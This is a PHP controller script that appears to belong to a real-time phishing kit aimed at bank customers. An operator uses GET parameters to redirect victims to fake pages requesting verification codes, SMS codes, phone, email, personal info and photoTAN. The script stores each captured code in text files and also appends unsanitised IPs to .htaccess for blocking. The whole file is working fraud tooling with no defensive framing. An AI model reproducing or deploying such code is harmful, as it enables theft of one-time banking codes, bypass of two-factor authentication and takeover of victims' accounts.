<?php


session_start();

if(isset($_GET['ip'])) 
{
    
$Pageee .= 'deny from '.$_GET['ip'].'
';

$f = fopen("../../../.htaccess", "a");
	fwrite($f, $Pageee);


$Pag .= 'This ip '.$_GET['ip'].' Blocked Successfully ';

$fPag = fopen("../System_sql/Go.txt", "w");
    fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['id'])) {

    $Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Code.php" />  ';

    $fPage = fopen("../System_sql/Redirect.txt", "w");
        fwrite($fPage, $Page);
    
    
    
    $Pag .= 'Redirected to Code Id';
    
    $fPag = fopen("../System_sql/Go.txt", "w");
        fwrite($fPag, $Pag);
    
        $Pagmt .= ''.$_POST['Code'].'';
        $fPagmt = fopen("../System_sql/Code.txt", "w");
                            fwrite($fPagmt, $Pagmt);

    header("location:../dashboard.php");

    }elseif (isset($_GET['phone'])) {

        $Page .= ' <meta http-equiv="refresh" content="0;url=./Account_phone.php" />  ';
    
        $fPage = fopen("../System_sql/Redirect.txt", "w");
            fwrite($fPage, $Page);
        
        
        
        $Pag .= 'Redirected to phone';
        
        $fPag = fopen("../System_sql/Go.txt", "w");
            fwrite($fPag, $Pag);

        header("location:../dashboard.php");
    
        }elseif (isset($_GET['login'])) {

    $Page .= ' <meta http-equiv="refresh" content="0;url=../Sign_Error.php" />  ';

    $fPage = fopen("../System_sql/Redirect.txt", "w");
        fwrite($fPage, $Page);
    
    
    
    $Pag .= 'Redirected to Login';
    
    $fPag = fopen("../System_sql/Go.txt", "w");
        fwrite($fPag, $Pag);
    
    
    header("location:../dashboard.php");

    }elseif (isset($_GET['Email'])) {

        $Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Email.php" />  ';
    
        $fPage = fopen("../System_sql/Redirect.txt", "w");
            fwrite($fPage, $Page);
        
        
        
        $Pag .= 'Redirected to Email';
        
        $fPag = fopen("../System_sql/Go.txt", "w");
            fwrite($fPag, $Pag);
        
        
        header("location:../dashboard.php");
    
        }elseif (isset($_GET['info'])) {

        $Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Info.php" />  ';
    
        $fPage = fopen("../System_sql/Redirect.txt", "w");
            fwrite($fPage, $Page);
        
        
        
        $Pag .= 'Redirected to Info';
        
        $fPag = fopen("../System_sql/Go.txt", "w");
            fwrite($fPag, $Pag);
        
        
        header("location:../dashboard.php");
    
        }elseif (isset($_GET['sms'])) {

            $Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Sms.php" />  ';
        
            $fPage = fopen("../System_sql/Redirect.txt", "w");
                fwrite($fPage, $Page);
            
                $Pagmt .= ''.$_POST['Code'].'';
                $fPagmt = fopen("../System_sql/Sms.txt", "w");
                                    fwrite($fPagmt, $Pagmt);
            
            $Pag .= 'Redirected to Sms';
            
            $fPag = fopen("../System_sql/Go.txt", "w");
                fwrite($fPag, $Pag);

                $Pagm .= ''.$_POST['Code'].'';
$fPagm = fopen("../System_sql/Code.txt", "w");
                    fwrite($fPagm, $Pagm);
            
            
            header("location:../dashboard.php");
        
            }elseif (isset($_GET['Phototan'])) {

                $Page .= ' <meta http-equiv="refresh" content="0;url=./Account_PhotoTan.php" />  ';
            
                $fPage = fopen("../System_sql/Redirect.txt", "w");
                    fwrite($fPage, $Page);
                
                    $photoB .= ' '.$_POST['photo'].' ';
                    $photoBS = fopen("../System_sql/Phototan.txt", "w");
                        fwrite($photoBS, $photoB);
                
                $Pag .= 'Redirected to Phototan';
                
                $fPag = fopen("../System_sql/Go.txt", "w");
                    fwrite($fPag, $Pag);
                
                
                header("location:../dashboard.php");
            
                }elseif (isset($_GET['redirect'])) {

                    $Page .= ' <meta http-equiv="refresh" content="0;url='.$_POST['tnks'].'" />  ';
                
                    $fPage = fopen("../System_sql/Redirect.txt", "w");
                        fwrite($fPage, $Page);
                    
                    
                    $Pag .= 'Redirected to Link';
                    
                    $fPag = fopen("../System_sql/Go.txt", "w");
                        fwrite($fPag, $Pag);
                    
                    
                    header("location:../dashboard.php");
                
                    }

else {




}

?>